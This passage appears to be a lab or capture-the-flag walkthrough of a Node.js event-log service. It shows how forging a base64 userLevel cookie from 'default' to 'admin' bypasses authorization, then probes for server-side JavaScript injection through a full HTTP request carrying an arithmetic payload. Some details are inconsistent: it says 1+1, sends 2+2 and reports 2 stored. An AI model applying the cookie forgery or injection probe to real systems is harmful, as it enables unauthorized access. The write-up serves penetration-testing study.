3000 - Web Services
Weak authentication
This seems to be an event system that allows us to message an administrator. We can easily create a new user via the Register link. Once registered and logged in, we are able to add a new log event under the New Event Log tab. However, when we try to submit the new event, the system prompts that "Only the admin can update the Event logs".
One interesting thing to notice is the presence of a userLevel cookie with the value ZGVmYXVsdA%3D%3D. Let's try to base64-decode the string:
kali@kali:~$ echo "ZGVmYXVsdA==" | base64 --decode
defaultThis decodes as default, which may refer to our access level. Let's try to update the userLevel cookie with a new value:
kali@kali:~$ echo -n admin | base64
YWRtaW4=With this modification in place, we can now send messages.
The next interesting find is the add technical details/code if required Event Message. Considering that this is a NodeJS application, it might be possible to inject Javascript Code.
3000/tcp open http syn-ack ttl 63 Node.js (Express middleware)
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONSTo test this, we'll send a simple 1+1 operation as an "Event Message".
Request Used:
POST /logs/new HTTP/1.1
Host: 192.168.135.110:3000
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 25
Origin: http://192.168.135.110:3000
Connection: close
Referer: http://192.168.135.110:3000/logs/
Cookie: connect.sid=s%3AmSgkU3koIQeob1Pioo6GSNTjGvc71M7v.ehFLVLDZWnWSLoKEcRe%2B4BWhaQz7TCQJ9dub4Xc3Cac; userLevel=YWRtaW4=
Upgrade-Insecure-Requests: 1
Sec-GPC: 1
username=khjkhk&msg=2%2B2Notice the userLevel cookie how we can exploit it by changing it in base64.
Send event
After reviewing the resulting stored message, we confirm that it actually saved 2.
Event result
Last updated